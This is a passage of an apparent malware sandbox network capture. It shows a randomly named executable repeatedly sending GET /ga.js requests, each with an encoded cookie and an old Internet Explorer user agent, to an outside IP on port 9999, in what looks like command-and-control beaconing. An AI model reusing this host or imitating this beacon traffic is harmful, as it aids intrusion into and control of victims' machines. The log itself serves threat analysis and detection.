Oct 8, 2024 04:20:59.180902004 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:00.072031975 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:20:59 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	54334	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:00.192292929 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:01.113792896 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:00 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	54335	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:01.243838072 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:02.144619942 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:01 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	54336	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:02.259332895 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:03.188548088 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:03 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	54337	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:03.303472996 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:04.204377890 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	54338	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:04.320166111 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:05.212778091 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	54339	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:05.342331886 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:06.269792080 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.4	54340	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:06.380721092 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:07.376259089 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.4	54341	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:07.510016918 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:08.433435917 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.4	54342	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:08.551886082 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:09.475200891 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:09 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.4	54343	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:09.604908943 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:10.516036034 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.4	54344	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:10.630623102 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:11.516216040 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.4	54345	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:11.633320093 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:12.546214104 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.4	54346	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:12.663175106 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:13.557485104 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.4	54347	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:13.683408976 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:14.570394993 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.4	54348	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:14.692572117 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:15.586369991 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.4	54349	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:15.713223934 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:16.631016016 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.4	54350	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:16.744858027 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:17.666732073 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.4	54351	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:17.787441015 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:18.680684090 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:18 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.4	54352	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:18.802515030 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:19.725578070 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:19 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.4	54353	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:19.851485968 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:20.756114006 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:20 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.4	54354	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:20.881249905 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:21.787461996 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:21 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.4	54355	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:21.923907995 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:22.846201897 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:22 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.4	54356	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:22.966972113 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:23.867352962 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:23 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.4	54357	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:23.991787910 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:24.912466049 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:24 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.4	54358	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:25.041091919 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:26.602613926 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:25 GMT Content-Type: application/octet-stream Content-Length: 0
Oct 8, 2024 04:21:26.602860928 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:25 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
137	192.168.2.4	54359	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:26.723853111 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:27.626897097 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:27 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.4	54360	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
Oct 8, 2024 04:21:27.743464947 CEST	401	OUT	GET /ga.js HTTP/1.1 Accept: / Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) Host: 47.239.242.141:9999 Connection: Keep-Alive Cache-Control: no-cache
Oct 8, 2024 04:21:28.650034904 CEST	114	IN	HTTP/1.1 200 OK Date: Tue, 8 Oct 2024 02:21:28 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.4	54361	47.239.242.141	9999	6476	C:\Users\user\Desktop\vNenBbeRFZ.exe

Timestamp	Bytes transferred	Direction	Data
